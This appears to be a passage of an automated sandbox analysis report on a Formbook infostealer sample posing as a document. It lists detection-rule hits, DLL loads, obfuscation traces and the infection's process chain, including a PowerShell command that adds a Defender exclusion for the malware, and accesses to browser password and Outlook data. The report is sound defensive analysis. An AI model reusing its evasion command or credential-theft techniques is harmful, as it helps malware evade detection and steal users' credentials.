                Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, JOPHjjJP1DReOpDY0L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, JOPHjjJP1DReOpDY0L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, JOPHjjJP1DReOpDY0L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@19/11
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PASU5160894680 DOCS.scr.exe.logJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMutant created: \Sessions\1\BaseNamedObjects\rpXhDySUSsBcArb
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1u5akofx.tei.ps1Jump to behavior
                Source: PASU5160894680 DOCS.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: control.exe, 00000006.00000003.2023994663.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4132398440.0000000002FBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PASU5160894680 DOCS.scr.exeReversingLabs: Detection: 31%
                Source: unknownProcess created: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: control.exe, 00000006.00000002.4134255300.000000000541C000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.4133923961.0000000004EB7000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000000.1915538876.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2136958626.00000000089CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uFLByAWAOFbhtV.exe, 00000005.00000000.1766652300.0000000000BDE000.00000002.00000001.01000000.0000000C.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132210801.0000000000BDE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: control.pdb source: vbc.exe, 00000004.00000002.1846972436.0000000005148000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000002.4132695833.0000000000728000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.1849604630.00000000049AD000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.1847230408.00000000047F3000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000006.00000003.1849604630.00000000049AD000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.1847230408.00000000047F3000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: vbc.pdb source: control.exe, 00000006.00000002.4134255300.000000000541C000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.4133923961.0000000004EB7000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000000.1915538876.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2136958626.00000000089CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: control.pdbUGP source: vbc.exe, 00000004.00000002.1846972436.0000000005148000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000002.4132695833.0000000000728000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.cs .Net Code: FYToGybVc5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.cs .Net Code: FYToGybVc5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.cs .Net Code: FYToGybVc5 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Code function: 0_2_01A760A8 push dword ptr [ecx+ecx-75h]; iretd 0_2_01A760BA
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Code function: 0_2_01AB2CBA push eax; iretd 0_2_01AB2CC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_004186EC push si; ret 4_2_00418702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041804C push 700438E3h; retf 4_2_00418060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041786E push ebx; iretd 4_2_004178DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_004030F0 push eax; ret 4_2_004030F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041788A push ebx; iretd 4_2_004178DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A265 pushfd ; retf 4_2_0041A26C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_004132CA push edx; retf 4_2_004132CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_004186F4 push esi; ret 4_2_00418702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A27FA pushad ; ret 4_2_055A27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A225F pushad ; ret 4_2_055A27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055D09AD push ecx; mov dword ptr [esp], ecx 4_2_055D09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A283D push eax; iretd 4_2_055A2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A1338 push eax; iretd 4_2_055A1369
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe Code function: 5_2_03C0BF2C push es; retf 5_2_03C0BF2D
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe Code function: 5_2_03C026A4 push edx; retf 5_2_03C026A8
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe Code function: 5_2_03C0963F pushfd ; retf 5_2_03C09646
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe Code function: 5_2_03C0459E push edx; iretd 5_2_03C045A0
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe Code function: 5_2_03C06C48 push ebx; iretd 5_2_03C06CB6
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe Code function: 5_2_03C06C64 push ebx; iretd 5_2_03C06CB6
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe Code function: 5_2_03C07426 push 700438E3h; retf 5_2_03C0743A
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04B909AD push ecx; mov dword ptr [esp], ecx 6_2_04B909B6
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C620D1 push edx; iretd 6_2_00C620D3
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C70041 push esp; iretd 6_2_00C70042
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C601D7 push edx; retf 6_2_00C601DB
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C67172 pushfd ; retf 6_2_00C67179
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C655F9 push si; ret 6_2_00C6560F
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C65601 push esi; ret 6_2_00C6560F
